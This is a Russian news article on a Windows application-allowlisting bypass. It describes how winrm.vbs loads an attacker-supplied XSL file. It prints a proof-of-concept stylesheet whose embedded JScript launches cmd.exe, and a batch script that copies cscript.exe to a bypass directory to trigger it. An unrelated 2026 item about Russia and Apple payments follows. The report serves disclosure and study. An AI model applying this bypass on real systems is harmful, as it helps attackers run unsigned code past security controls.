В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51

...

В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Следующая главная новость »

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!

Екатерина Быстрова 30 Марта 2026 - 11:58

iOS Соответствие законодательству РФ Общее Apple

В России хотят ограничить оплату сервисов Apple ради возврата приложений

У Apple в России может появиться ещё одна точка давления. В Минцифры на совещании с операторами «большой четвёрки» 28 марта обсуждали возможность временно приостановить оплату сервисов Apple со счёта мобильного телефона. Идея в том, чтобы подтолкнуть компанию к возвращению популярных российских приложений в App Store.

Как утверждает источник РИА Новости, речь идёт о попытке повлиять на Apple через деньги: если ограничить один из привычных способов оплаты, потери для компании могут оказаться достаточно чувствительными, чтобы она стала активнее исполнять требования российского законодательства.

В качестве претензий к Apple собеседник агентства перечислил сразу несколько тем. Во-первых, с 2022 года компания, по его словам, удалила из App Store десятки российских приложений — в том числе банковские, картографические, авиационные сервисы, классифайды и агрегаторы.

Во-вторых, Apple, как утверждается, не исполняет решение ФАС по так называемому «окну выбора» поисковика по умолчанию на iPhone и iPad.

Кроме того, источник РИА Новости заявил, что компания по-прежнему не выполняет требование о возможности установки российского магазина приложений RuStore на устройства Apple.

Ещё одна претензия касается VPN-приложений: по словам собеседника агентства, Apple не в полной мере исполняет требования Роскомнадзора по их удалению из российского App Store. При этом тема VPN для регулятора остаётся чувствительной уже не первый год.

Пока речь идёт именно об обсуждении возможной меры, а не о принятом решении. Но сам факт появления такого сценария показывает, что спор вокруг App Store, российских приложений и правил работы Apple в стране явно выходит на новый уровень.

Если эту идею всё же доведут до реализации, для пользователей это может означать новые ограничения при оплате сервисов Apple через мобильный счёт. А для самой компании — ещё один сигнал, что вопросы локального регулирования в России всё труднее игнорировать.

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!